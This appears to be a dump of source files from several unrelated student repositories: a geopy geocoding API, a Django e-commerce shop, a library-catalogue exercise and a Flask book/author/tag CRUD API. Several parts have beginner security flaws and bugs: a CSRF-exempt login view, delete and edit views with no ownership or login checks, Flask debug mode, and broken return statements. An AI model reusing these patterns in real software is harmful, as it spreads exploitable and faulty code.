class GeocodingModel(BaseModel):
address: str
class GeocodingDetailModel(BaseModel):
address: str
coordinates: ReverseGeocodingModel
--- FILE SEPARATOR ---
from pydantic import BaseModel, validator
class ReverseGeocodingModel(BaseModel):
latitude: float
longitude: float
@validator("latitude")
def validate_latitude(cls, value):
if not (value >= -90 and value <= 90):
raise ValueError("not a valid latitude")
return value
@validator("longitude")
def validate_longitude(cls, value):
if not (value >= -180 and value <= 180):
raise ValueError("not a valid longitude")
return value
--- FILE SEPARATOR ---
from geopy.geocoders import Nominatim
def get_address_details(address: str):
try:
locator = Nominatim(user_agent="Keshav")
address_detail = locator.geocode(address)
res = {}
if address_detail:
res["address"] = address_detail.address
res["coordinates"] = {
"latitude": address_detail.latitude,
"longitude": address_detail.longitude,
}
return res
else:
return None
except Exception as e:
print(e)
def get_reverse(coords: tuple):
try:
locator = Nominatim(user_agent="keshav")
address = locator.reverse(coords)
res = {}
if address:
res["address"] = address.address
return res
else:
None
except Exception as e:
print(e)
--- FILE SEPARATOR ---
from geopy.distance import geodesic
def calculate_geo_distance(point1, point2, result_in):
distance = geodesic(point1, point2)
if result_in == "kilometers":
distance = distance.kilometers
elif result_in == "meters":
distance = distance.meters
elif result_in == "miles":
distance = distance.miles
return distance
--- FILE SEPARATOR ---
def create_response(success, data):
if success:
res = {"success": success, "data": data}
else:
res = {"success": success, "data": {}}
return res
|
[
"/src/api/routes/__init__.py",
"/src/api/routes/geo_coding/__init__.py",
"/src/api/routes/geo_coding/geo_code.py",
"/src/api/routes/geo_distance/__init__.py",
"/src/api/routes/geo_distance/geo_distance.py",
"/src/api/routes/reverse_geocoding/__init__.py",
"/src/api/routes/reverse_geocoding/reverse_geocode.py",
"/src/main.py",
"/src/models/__init__.py",
"/src/models/geo_distance.py",
"/src/models/geocoding.py",
"/src/models/reverse_geocoding.py",
"/src/utils/address.py",
"/src/utils/geo_distance.py",
"/src/utils/response.py"
] |
007sambhavjain/ecommerce
|
"""csd URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from main import views
from django.conf.urls.static import static
from django.conf import settings
urlpatterns = [
path('admin/', admin.site.urls),
path('sign_up/', views.sign_up),
path('sign_in/', views.sign_in),
path('vendor/', views.vendor_profile,name='vendor'),
path('product/<str:pk>', views.product,name='product'),
path('delete/<str:pk>', views.delete_task,name='delete'),
path('store/', views.store,name='store'),
path('cart/<str:pk>', views.cart,name='cart'),
path('quantity/<str:pk>', views.quantity,name='quantity'),
path('carts/', views.carts,name='carts'),
path('money/', views.money,name='money'),
path('order/', views.order,name='order'),
path('previous/', views.previous,name='previous'),
path('prev/', views.previous_vendor,name='previous_vendor'),
path('del/<str:pk>', views.delet,name='del'),
path('accounts/', include('allauth.urls')),
path('choice/', views.choice,name='choice'),
path('signout/',views.sign_out,name='signout'),
]
urlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)
--- FILE SEPARATOR ---
from django import forms
from django.forms import ModelForm
from .models import *
class ProductForm(forms.ModelForm):
class Meta:
model = Product
fields=['title','cost','image','description','quantity']
--- FILE SEPARATOR ---
# Generated by Django 3.0.6 on 2020-05-27 11:59
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('main', '0012_auto_20200526_1731'),
]
operations = [
migrations.AlterField(
model_name='product',
name='customer',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='customer', to='main.Customer'),
),
migrations.AlterField(
model_name='product',
name='quantity',
field=models.IntegerField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='product',
name='vendor',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='vendor', to='main.Vendor'),
),
migrations.CreateModel(
name='Orderitem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.IntegerField(blank=True, default=0, null=True)),
('product', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='product', to='main.Product')),
],
),
]
--- FILE SEPARATOR ---
# Generated by Django 3.0.6 on 2020-05-27 20:35
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('main', '0018_auto_20200527_1935'),
]
operations = [
migrations.AlterField(
model_name='orderitem',
name='product',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='product', to='main.Product'),
),
migrations.AlterField(
model_name='product',
name='customer',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='customer', to='main.Customer'),
),
migrations.AlterField(
model_name='product',
name='vendor',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='vendor', to='main.Vendor'),
),
migrations.CreateModel(
name='ShippingAddress',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('address', models.CharField(max_length=100)),
('city', models.CharField(max_length=100)),
('state', models.CharField(max_length=100)),
('zipcode', models.CharField(max_length=100)),
('date_added', models.DateTimeField(auto_now_add=True)),
('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='main.Customer')),
('order', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='main.Orderitem')),
],
),
]
--- FILE SEPARATOR ---
from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
# Create your models here.
class Customer(models.Model):
user=models.OneToOneField(User,related_name='customer',on_delete=models.CASCADE,blank=True,null=True)
name=models.CharField(max_length=50)
mobile_number=models.CharField(max_length=20)
money=models.FloatField(default=0)
def __str__(self):
return self.name
class Vendor(models.Model):
user=models.OneToOneField(User,related_name='vendor',on_delete=models.CASCADE,blank=True,null=True)
name=models.CharField(max_length=50)
mobile_number=models.CharField(max_length=20)
def __str__(self):
return self.name
class Product(models.Model):
vendor=models.ForeignKey('Vendor',related_name='vendor',on_delete=models.CASCADE,blank=True,null=True)
customer=models.ForeignKey('Customer',related_name='customer',on_delete=models.CASCADE,blank=True,null=True)
title=models.CharField(max_length=20)
cost=models.FloatField()
image=models.ImageField(upload_to= '',null=True,blank=True)
description=models.CharField(max_length=50,blank=True,null=True)
quantity=models.FloatField(blank=True,null=True)
def __str__(self):
return self.title
@property
def imageURL(self):
try:
url=self.image.url
except:
url=''
return url
class Order(models.Model):
customer=models.ForeignKey('Customer',on_delete=models.SET_NULL,null=True,blank=True)
quantity=models.FloatField(default=1,blank=True,null=True)
vend=models.ForeignKey('Vendor',related_name='vend',on_delete=models.CASCADE,null=True,blank=True)
prod=models.ForeignKey('Product',related_name='prod',on_delete=models.CASCADE,blank=True,null=True)
def __str__(self):
return str(self.id)
class Orderitem(models.Model):
product=models.ForeignKey('Product',related_name='product',on_delete=models.CASCADE,blank=True,null=True)
quantity=models.FloatField(default=1,blank=True,null=True)
custom=models.ForeignKey('Customer',related_name='custom',on_delete=models.CASCADE,blank=True,null=True)
ven=models.ForeignKey('Vendor',related_name='ven',on_delete=models.CASCADE,null=True,blank=True)
def __str__(self):
return self.product.title
@property
def total(self):
tot=(self.product.cost)*(self.quantity)
return tot
# class Orderitem(models.Model):
# customer=models.ForeignKey(Customer,on_delete=models.SET_NULL,null=True,blank=True)
# product=models.ForeignKey(Product,on_delete=models.SET_NULL,null=True,blank=True)
# quantity=models.IntegerField(default=0,null=True)
# def __str__(self):
# return self.product.title
class ShippingAddress(models.Model):
customer=models.ForeignKey(Customer,on_delete=models.SET_NULL,null=True,blank=True)
order=models.ForeignKey(Orderitem,on_delete=models.SET_NULL,null=True,blank=True)
address=models.CharField(max_length=100,null=False)
city=models.CharField(max_length=100,null=False)
state=models.CharField(max_length=100,null=False)
def __str__(self):
return self.address
--- FILE SEPARATOR ---
from django.shortcuts import render,redirect
from django.http import HttpResponse
from django.contrib.auth import login,authenticate,logout
from django.views.decorators.csrf import csrf_exempt
from .models import *
from .forms import *
import os
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import Mail
# Create your views here.
def choice(request):
if request.method=='GET':
curr=request.user
if curr:
if Customer.objects.filter(user=curr):
return redirect('/store/')
if Vendor.objects.filter(user=curr):
return('/vendor/')
else:
return render(request,'main/choice.html')
if request.method=='POST':
curr=request.user
usertype = request.POST.get('type')
if usertype == 'customer':
cust = Customer.objects.create(user=request.user)
cust.save()
return redirect('/store/')
if usertype == 'vendor':
venr = Vendor.objects.create(user=request.user)
venr.save()
return('/vendor/')
def sign_up(request):
if request.method== 'GET':
# message = Mail(
# from_email='f20190255@pilani.bits-pilani.ac.in',
# to_emails='f20190255@pilani.bits-pilani.ac.in',
# subject='Sending with Twilio SendGrid is Fun',
# html_content='<strong>and easy to do anywhere, even with Python</strong>')
# try:
# sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))
# response = sg.send(message)
# print(response.status_code)
# print(response.body)
# print(response.headers)
# # except Exception as e:
# # print(e.message)
# except:
# print("akn")
return render(request,'main/sign_up.html')
if request.method=='POST':
username = request.POST.get('username')
password = request.POST.get('password')
name = request.POST.get('name')
phone_number = request.POST.get('phone')
usertype = request.POST.get('type')
if len(phone_number) != 10:
return HttpResponse('Phone number must be 10 digits long')
if User.objects.filter(username=username).exists():
return HttpResponse('Username already taken!')
user = User.objects.create_user(username=username, password=password)
if usertype == 'customer':
cust = Customer.objects.create(user=user, name=name, mobile_number=phone_number)
cust.save()
if usertype == 'vendor':
venr = Vendor.objects.create(user=user, name=name, mobile_number=phone_number)
venr.save()
return render(request,'main/sign_up.html')
@csrf_exempt
def sign_in(request):
if request.method=='GET':
return render(request,'main/sign_in.html')
if request.method=='POST':
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(username=username, password=password)
if Customer.objects.filter(user=user):
login(request,user)
cust=Customer.objects.get(user=user)
return redirect('/store/')
if Vendor.objects.filter(user=user):
login(request,user)
vend=Vendor.objects.get(user=user)
return redirect('/vendor/')
def vendor_profile(request):
if not request.user.is_authenticated:
return HttpResponse('User is not authenticated!')
curr=request.user
if Vendor.objects.filter(user=curr):
form = ProductForm()
vend = Vendor.objects.get(user=curr)
pro=Product.objects.filter(vendor=vend)
if request.method == 'POST':
# title = str(request.POST.get('title'))
# content = str(request.POST.get('content'))
# price = str(request.POST.get('price'))
# vend = Vendor.objects.get(user=curr)
# prod = Product.objects.create(title=title,cost=price, description=content, vendor=vend)
form = ProductForm(request.POST)
if form.is_valid():
product = form.save(commit=False)
product.vendor=vend
product.save()
return redirect('/vendor/')
return render(request,'main/vendor.html',{'pro': pro,'form':form})
def product(request,pk):
if not request.user.is_authenticated:
return HttpResponse('user not authenticated')
prod=Product.objects.get(id=str(pk))
form = ProductForm(instance=prod)
if request.method=='POST':
form = ProductForm(request.POST,instance=prod)
if form.is_valid():
form.save()
return redirect('/vendor/')
context={'form':form}
# pro=Product.objects.get(id=str(pk))
# # s=Product(instance=pro)
# form = ProductForm()
return render(request,'main/product.html',context)
def delete_task(request,pk):
item = Product.objects.get(id=str(pk))
if request.method=='POST':
item.delete()
return redirect('/vendor')
context={'item':item}
return render(request,'main/delete.html',context)
def store(request):
if not request.user.is_authenticated:
return HttpResponse('User is not authenticated!')
curr=request.user
if Customer.objects.filter(user=curr):
product=Product.objects.all()
context={'product':product}
return render(request,'main/store.html',context)
def cart(request,pk):
# if request.user.is_authenticated:
# curr=request.user
# if Customer.objects.filter(user=curr):
# if request.method=='POST':
# cust=Customer.objects.get(user=curr)
# product=Product.objects.get(id=str(pk))
# quan=request.POST.get('quantity')
# qe=w.quantity
# total=float(qe)*w.product.cost
# if request.method=='GET':
# cust=Customer.objects.get(user=curr)
# product=Product.objects.get(id=str(pk))
# quan=request.POST.get('quantity')
# order=Orderitem.objects.create(product=product,quantity=quan)
# # total=w.product.cost
# return render(request,'main/cart.html',{'':w})
if request.user.is_authenticated:
curr=request.user
if Customer.objects.filter(user=curr):
if request.method=='GET':
cust=Customer.objects.get(user=curr)
product=Product.objects.get(id=str(pk))
quan=request.POST.get('quantity')
y=Orderitem.objects.filter(custom=cust,product=product)
if y:
return redirect('/carts/')
else:
order=Orderitem.objects.create(custom=cust,product=product,quantity=1,ven=product.vendor)
items=Orderitem.objects.all().filter(custom=cust)
tot=sum([item.total for item in items])
context={'items':items,'cust':cust,'tot':tot}
return render(request,'main/cart.html',context)
def quantity(request,pk):
if request.user.is_authenticated:
curr=request.user
if Customer.objects.filter(user=curr):
if request.method=='POST':
cust=Customer.objects.get(user=curr)
product=Product.objects.get(id=str(pk))
quan=request.POST.get('quantity')
order=Orderitem.objects.get(custom=cust,product=product)
order.quantity=quan
order.save()
return redirect('/carts/')
if request.method=='GET':
return render(request,'main/quantity.html')
def carts(request):
if request.user.is_authenticated:
curr=request.user
if Customer.objects.filter(user=curr):
cust=Customer.objects.get(user=curr)
items=Orderitem.objects.all().filter(custom=cust)
tot=sum([item.total for item in items])
context={'items':items,'cust':cust,'tot':tot}
return render(request,'main/carts.html',context)
def money(request):
if request.user.is_authenticated:
curr=request.user
if Customer.objects.filter(user=curr):
mon=request.POST.get('money')
if request.method=='GET':
return render(request,'main/money.html')
if request.method=='POST':
cust=Customer.objects.get(user=curr)
cust.money+=float(mon)
cust.save()
return redirect('/carts/')
def order(request):
if request.user.is_authenticated:
curr=request.user
if Customer.objects.filter(user=curr):
cust=Customer.objects.get(user=curr)
order=Orderitem.objects.all().filter(custom=cust)
tot=sum([it.total for it in order])
if request.method=='GET':
return render(request,'main/order.html')
if request.method=='POST':
adress = request.POST.get('adress')
city = request.POST.get('city')
state = request.POST.get('state')
if ShippingAddress.objects.filter(customer=cust,address=adress,city=city,state=state):
ship=ShippingAddress.objects.get(customer=cust,address=adress,city=city,state=state)
else:
ship=ShippingAddress.objects.create(customer=cust,address=adress,city=city,state=state)
if cust.money>=tot:
for item in order:
if item.quantity!=0:
if item.product.quantity>=item.quantity :
item.product.quantity-=item.quantity
item.product.save()
else:
return HttpResponse(str(item.product.title) + ' has only '+ str(item.product.quantity) + ' left. so cannot place order ')
else:
return HttpResponse('cannot order 0 product')
else:
return HttpResponse("you don't have enough money")
cust.money-=tot
cust.save()
for item in order:
final=Order.objects.create(customer=cust,quantity=item.quantity,vend=item.ven,prod=item.product)
item.delete()
return render(request,'main/final.html',{'ship':ship})
def previous(request):
if request.user.is_authenticated:
curr=request.user
if Customer.objects.filter(user=curr):
cust=Customer.objects.get(user=curr)
order=Order.objects.all().filter(customer=cust)
return render(request,'main/previous.html',{'order':order})
def previous_vendor(request):
if request.user.is_authenticated:
curr=request.user
if Vendor.objects.filter(user=curr):
ven=Vendor.objects.get(user=curr)
order=Order.objects.all().filter(vend=ven)
return render(request,'main/previous_vendor.html',{'order':order})
def delet(request,pk):
if request.user.is_authenticated:
curr=request.user
if Customer.objects.filter(user=curr):
cust=Customer.objects.get(user=curr)
product=Product.objects.get(id=str(pk))
order=Orderitem.objects.get(custom=cust,product=product)
if request.method=='POST':
order.delete()
return redirect('/carts/')
if request.method=='GET':
return render(request,'main/dele.html',{'order':order})
def sign_out(request):
if not request.user.is_authenticated:
return HttpResponse('User is not signed in, so he cannot sign out')
logout(request)
return HttpResponse('User has been logged out')
|
[
"/csd/urls.py",
"/main/forms.py",
"/main/migrations/0013_auto_20200527_1159.py",
"/main/migrations/0019_auto_20200527_2035.py",
"/main/models.py",
"/main/views.py"
] |
007urmi/Edyoda_python
|
# -*- coding: utf-8 -*-
from Book import Book
from Catalog import Catalog
from User import Member, Librarian
#b1 = Book('Shoe Dog','Phil Knight', '2015',312)
#b1.addBookItem('123hg','H1B2')
#b1.addBookItem('124hg','H1B3')
#b1.printBook()
catalog = Catalog()
b = catalog.addBook('Shoe Dog','Phil Knight', '2015',312)
catalog.addBookItem(b, '123hg','H1B2')
catalog.addBookItem(b, '124hg','H1B4')
catalog.addBookItem(b, '125hg','H1B5')
b = catalog.addBook('Moonwalking with Einstien','J Foer', '2017',318)
catalog.addBookItem(b, '463hg','K1B2')
b = catalog.addBook('Pax','Sara Pennypacker', '2017', 288)
catalog.addBookItem(b,'554jk','M24A')
catalog.addBookItem(b,'556jk','M25A')
catalog.addBookItem(b,'557jk','M26A')
#catalog.displayAllBooks()
# #member
# m1 = Member("Vish","Bangalore",23,'asljlkj22','std1233')
# m1.availableBooks(catalog)
# print (m1)
# #print (librarian)
# m1.issueBook('Moonwalking with Einstien',catalog)
# m1.returnBook('Moonwalking with Einstien',catalog)
#
# catalog.displayAllBooks()
#b = catalog.searchByName('Shoe Dog')
#print (b)
#b = catalog.searchByAuthor('J Foer')
#print(b)
catalog.removeBookItem('Shoe Dog','124hg')
catalog.removeBook('Shoe Dog')
catalog.displayAllBooks()
# #reference to Librarian class object
# librarian = Librarian("Awantik","Bangalore",34,'asljlkj22','zeke101')
# # adding a book by librarian
# b2 =librarian.addBook("This is Going to Hurt: Secret Diaries of a Junior Doctor","Adam Key",'2017', 302,catalog)
# #adding details
# librarian.addBookItem(b2,'234c','l203',catalog)
# #displaying all the books till now added
# librarian.displayAddedBook(catalog)
# #library remove book
# librarian.removeBook('Shoe Dog')
# #displaying book after removing
# librarian.displayAddedBook(catalog)
--- FILE SEPARATOR ---
from Catalog import Catalog
from User import Member
catalog = Catalog()
b = catalog.addBook('Shoe Dog','Phil Knight', '2015',312)
catalog.addBookItem(b, '123hg','H1B2')
catalog.addBookItem(b, '124hg','H1B4')
catalog.addBookItem(b, '125hg','H1B5')
b = catalog.addBook('Moonwalking with Einstien','J Foer', '2017',318)
catalog.addBookItem(b, '463hg','K1B2')
b = catalog.addBook('Pax','Sara Pennypacker', '2017', 288)
catalog.addBookItem(b,'554jk','M24A')
catalog.addBookItem(b,'556jk','M25A')
catalog.addBookItem(b,'557jk','M26A')
catalog.displayAllBooks()
catalog.removeBook('Pax')
catalog.displayAllBooks()
catalog.removeBookItem('Shoe Dog','124hg')
catalog.displayAllBooks()
b = catalog.searchByName('Shoe Dog')
print (b)
b = catalog.searchByAuthor('J Foer')
print(b)
#member
m1 = Member("Vish","Bangalore",23,'asljlkj22','std1233')
m1.availableBooks(catalog)
print (m1)
m1.issueBook('Moonwalking with Einstien',catalog)
m1.returnBook('Moonwalking with Einstien',catalog)
--- FILE SEPARATOR ---
from Book import Book
from Catalog import Catalog
from User import Member, Librarian
catalog = Catalog()
#reference to Librarian class object
librarian = Librarian("Awantik","Bangalore",34,'asljlkj22','zeke101')
#details of librarian
print (librarian)
# adding a book by librarian
b2 =librarian.addBook("This is Going to Hurt: Secret Diaries of a Junior Doctor","Adam Key",'2017', 302,catalog)
#adding details
librarian.addBookItem(b2,'234c','l203',catalog)
#displaying all the books till now added
librarian.displayAddedBook(catalog)
#library remove book
librarian.removeBook('Shoe Dog',catalog)
librarian.addBookItem(b2,'235c','1204',catalog)
librarian.removeBookItemFromCatalog(catalog,"This is Going to Hurt: Secret Diaries of a Junior Doctor",'235c')
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
from Catalog import Catalog
from Book import Book
class User:
def __init__(self, name, location, age, aadhar_id):
self.name = name
self.location = location
self.age = age
self.aadhar_id = aadhar_id
class Member(User):
def __init__(self,name, location, age, aadhar_id,student_id):
super().__init__(name, location, age, aadhar_id)
self.student_id = student_id
self.issued_book = []
def __repr__(self):
return self.name + ' ' + self.location + ' ' + self.student_id
def availableBooks(self,Catalog):
print("Available books are:")
Catalog.displayAllBooks()
#assume name is unique
def issueBook(self,name,Catalog,days=10):
book = Catalog.searchByName(name)
if len(book.book_item) > 0:
b1= book.book_item[0]
self.issued_book.append(b1)
Catalog.removeBookItem(name,b1.isbn)
print(name ,"book is isssued")
else:
print("Book is not available")
#assume name is unique
def returnBook(self,name,Catalog):
book = Catalog.searchByName(name)
for self.items in self.issued_book:
if book.book_item in self.issued_book:
b2 = book.book_item
self.issued_book.remove(book.book_item)
Catalog.addBookItem(book,b2.isbn,b2.rack)
print(name,"Book is returned")
class Librarian(User):
def __init__(self,name, location, age, aadhar_id,emp_id):
super().__init__(name, location, age, aadhar_id)
self.emp_id = emp_id
self.book2 = []
def __repr__(self):
return self.name + ' ' + self.location + ' ' + self.emp_id
def addBook(self,name,author,publish_date,pages,Catalog):
b3 = Catalog.addBook(name,author,publish_date,pages)
self.book2.append(b3)
print("A book is added by Librarian")
return b3
def addBookItem(self,book,isbn,rack,Catalog):
Catalog.addBookItem(book,isbn,rack)
print("Details of the book is added")
def displayAddedBook(self,Catalog):
Catalog.displayAllBooks()
def removeBook(self,name,Catalog):
Catalog.removeBook(name)
Catalog.different_book_count -=1
print ("Book removed")
def removeBookItemFromCatalog(self,Catalog,name,isbn):
Catalog.removeBookItem(name,isbn)
|
[
"/TestFunctions.py",
"/Test_Catalog_member.py",
"/Test_Library.py",
"/User.py"
] |
009Kings/Author-book-tags-Full-Crud
|
from flask import request, jsonify
from models import app
from functions import create_user, get_all_users, get_user, update_user, delete_user
from functions import create_author, get_all_authors, get_author, update_author, delete_author
from functions import create_book, get_all_books, get_book, update_book, delete_book
from functions import add_tag, remove_tag, get_all_tags, delete_tag
@app.route("/api/user", methods=["GET", "POST"])
def users_read_create():
if request.method == "GET":
return get_all_users()
if request.method == "POST":
return create_user(username=request.form['username'], email=request.form['email'])
@app.route("/api/user/<id>", methods=["GET", "PUT", "DELETE"])
def one_user(id):
if request.method == "GET":
return get_user(id)
if request.method == "PUT":
return update_user(id, request.form['username'], request.form['email'])
if request.method == "DELETE":
return delete_user(id)
@app.route("/api/author", methods=["GET", "POST"])
def authors_read_create():
if request.method == "GET":
return get_all_authors()
if request.method == "POST":
return create_author(name=request.form['name'])
@app.route("/api/author/<id>", methods=["GET", "PUT", "DELETE"])
def one_author(id):
if request.method == "GET":
return get_author(id)
if request.method == "PUT":
return update_author(id, request.form['name'])
if request.method == "DELETE":
return delete_author(id)
@app.route("/api/book", methods=["GET", "POST"])
def books_read_create():
if request.method == "GET":
return get_all_books()
if request.method == "POST":
return create_book(request.form['title'], request.form['author'])
@app.route("/api/book/<id>", methods=["GET", "PUT", "DELETE"])
def one_book(id):
if request.method == "GET":
return get_book(id)
if request.method == "PUT":
return update_book(id, request.form['title'], request.form['author'])
if request.method == "DELETE":
return delete_book(id)
@app.route("/api/tag", methods=["POST", "PUT", "GET"])
def tag_read_create():
if request.method == "POST":
try:
if 'book_id' in request.form:
book_id = request.form['book_id']
else:
book_id = None
return add_tag(book_id=book_id, tag_name=request.form['tag'])
except Exception as err:
print("💥", err)
return jsonify(message="problem in add tag route")
if request.method == "PUT":
try:
return remove_tag(book_id=request.form['book_id'], tag=request.form['tag'])
except Exception as err:
print("💥", err)
return jsonify(message="problem in update tag route")
if request.method == "GET":
try:
return get_all_tags()
except Exception as err:
print("💥", err)
return jsonify(message="problem in get tag route")
@app.route("/api/tag/<id>", methods=["DELETE"])
def one_tag(id):
if request.method == "DELETE":
try:
return delete_tag(id)
except Exception as err:
print("💥", err)
return jsonify(message="problem in delete tag route")
if __name__ == '__main__':
app.run(debug=True)
--- FILE SEPARATOR ---
from flask import request, jsonify, redirect
from models import app, db, User, user_schema, users_schema, Author, author_schema, authors_schema, Book, book_schema, books_schema, Tag, tags_schema
def add_tag(book_id, tag_name):
if book_id:
try:
book = Book.query.filter_by(id=book_id).one()
tag = Tag.query.filter_by(tag=tag_name).one_or_none()
if not tag:
tag = Tag(tag=tag_name)
if book and tag:
book.tags.append(tag)
db.session.commit()
return redirect(f"/api/book/{book_id}")
else:
return jsonify(message='Problem in adding Tag')
except Exception as err:
print("💥", err)
return jsonify(message='Problem adding tag')
else:
try:
tag = Tag.query.filter_by(tag=tag_name).one_or_none()
if not tag:
db.session.add(Tag(tag=tag_name))
db.session.commit()
return redirect('/api/tag')
except Exception as err:
print("💥", err)
return jsonify(message='Problem adding tag')
def remove_tag(book_id, tag):
try:
book = Book.query.filter_by(id=book_id).one_or_none()
tag = Tag.query.filter_by(tag=tag).one_or_none()
if book and tag:
book.tags.remove(tag)
db.session.commit()
return redirect(f"/api/book/{book_id}")
else:
return jsonify(message=f"problem removing tag {tag} from book at id {book_id}")
except Exception as err:
print("💥", err)
return jsonify(message='Problem removing tag from book')
def get_all_tags():
try:
all_tags = Tag.query.all()
return tags_schema.jsonify(all_tags, many=True)
except Exception as err:
print("💥", err)
return jsonify(message='Problem getting all tags')
def delete_tag(tag_id):
try:
tag = Tag.query.get(tag_id)
if tag:
db.session.delete(tag)
db.session.commit()
return redirect("/api/tag")
except Exception as err:
print("💥", err)
return jsonify(message=f'Problem deleting tag at id {tag_id}')
def create_book(title, author):
new_book = Book(title=title, author_id=author)
try:
existing = Book.query.filter_by(title=title).filter_by(author_id=author).one_or_none()
if not existing:
db.session.add(new_book)
db.session.commit()
return book_schema.dump(new_book)
else:
return jsonify(message='Book already exists')
except Exception as err:
print("💥", err)
return jsonify(message='Problem creating new book')
def get_all_books():
all_books = Book.query.all()
if all_books:
result = books_schema.dump(all_books)
return jsonify(result)
else:
return jsonify(message='No books')
def get_book(id):
book = Book.query.get(id)
print("📖", book.tags[0].id)
if book:
return book_schema.jsonify(book)
else:
return jsonify(message='Error getting book at {}'.format(id))
def update_book(id, title, author):
try:
book = Book.query.get(id)
book.title = title
book.author = author
db.session.commit()
return redirect(f'/api/book/{id}')
except Exception as err:
print("💥", err)
return jsonify(message='Error updating author at {}'.format(id))
def delete_book(id):
try:
book = Book.query.get(id)
db.session.delete(book)
db.session.commit()
return redirect('/api/book')
except Exception as err:
print("💥", err)
return jsonify(message='Error deleting book at {}'.format(id))
def create_author(name):
new_author = Author(name=name)
try:
db.session.add(new_author)
db.session.commit()
return author_schema.dump(new_author)
except Exception as err:
print("💥", err)
return jsonify(message='Problem creating new author')
def get_all_authors():
all_authors = Author.query.all()
if all_authors:
return authors_schema.jsonify(all_authors, many=True)
else:
return jsonify(message='No authors')
def get_author(id):
author = Author.query.get(id)
if author:
# for book in author.books.all():
# print("📖", book.title)
return author_schema.jsonify(author, many=False)
else:
return jsonify(message='Error getting author at {}'.format(id))
def update_author(id, name):
try:
author = Author.query.get(id)
author.name = name
db.session.commit()
return redirect(f'/api/author/{id}')
except Exception as err:
print("💥", err)
return jsonify(message='Error updating author at {}'.format(id))
def delete_author(id):
try:
author = Author.query.get(id)
db.session.delete(author)
db.session.commit()
return redirect('/api/author')
except Exception as err:
print("💥", err)
return jsonify(message='Error deleting author at {}'.format(id))
def create_user(username, email):
new_user = User(username, email)
try:
db.session.add(new_user)
db.session.commit()
return user_schema.dump(new_user)
except Exception as err:
print("💥", err)
return jsonify(message='User already exists')
def get_all_users():
all_users = User.query.all()
if all_users:
result = users_schema.dump(all_users)
return jsonify(result)
else:
return jsonify(message='No users')
def get_user(id):
user = User.query.get(id)
if user:
return user_schema.jsonify(user)
else:
return jsonify(message='Error getting user at {}'.format(id))
def update_user(id, username, email):
try:
user = User.query.get(id)
user.email = email
user.username = username
db.session.commit()
return redirect(f'/api/user/{id}')
except Exception as err:
print("💥", err)
return jsonify(message='Error updating user at {}'.format(id))
def delete_user(id):
try:
user = User.query.get(id)
db.session.delete(user)
db.session.commit()
return redirect('/api/user')
except Exception as err:
print("💥", err)
return jsonify(message='Error deleting user at {}'.format(id))
--- FILE SEPARATOR ---
from flask import Flask, request, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_marshmallow import Marshmallow
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://kingkong@localhost/flasktoot1'
db = SQLAlchemy(app)
ma = Marshmallow(app)
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80), unique=True)
email = db.Column(db.String(120), unique=True)
def __init__(self, username, email):
self.username = username
self.email = email
class Author(db.Model):
__tablename__ = 'authors'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255))
books = db.relationship("Book", back_populates="author", lazy="dynamic")
book_tags = db.Table('book_tags',
db.Column('tag_id', db.Integer, db.ForeignKey('tags.id'), primary_key=True),
db.Column('book_id', db.Integer, db.ForeignKey('books.id'), primary_key=True)
)
class Book(db.Model):
__tablename__ = 'books'
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(255))
author_id = db.Column(db.Integer, db.ForeignKey("authors.id"))
author = db.relationship("Author", back_populates="books")
tags = db.relationship("Tag", secondary=book_tags,
back_populates="books", lazy="subquery",
cascade="all,delete")
class Tag(db.Model):
__tablename__ = 'tags'
id = db.Column(db.Integer, primary_key=True)
tag = db.Column(db.String(50), unique=True)
books = db.relationship("Book", secondary=book_tags,
back_populates="tags", cascade="delete")
class UserSchema(ma.Schema):
class Meta:
# Fields to expose
fields = ('id', 'username', 'email')
class AuthorSchema(ma.ModelSchema):
class Meta:
model = Author
fields = ('id', 'name', 'books')
books = ma.List(ma.HyperlinkRelated("one_book"))
links = ma.Hyperlinks({
'self': ma.URLFor('author', id='<id>'),
'collection': ma.URLFor('author'),
})
class TagSchema(ma.TableSchema):
class Meta:
table = Tag.__table__
fields = ['tag']
# Defining via model or table schema
# class BookSchema(ma.TableSchema):
# class Meta:
# table = Book.__table__
# fields = ('id', 'title', 'author')
# author = ma.Nested(AuthorSchema)
# links = ma.Hyperlinks({
# 'self': {
# 'href': ma.URLFor('book', id='<id>'),
# 'title': 'book_detail'
# },
# 'collection': ma.URLFor('book'),
# })
# If we want to reference the hyper link instead of nest the model
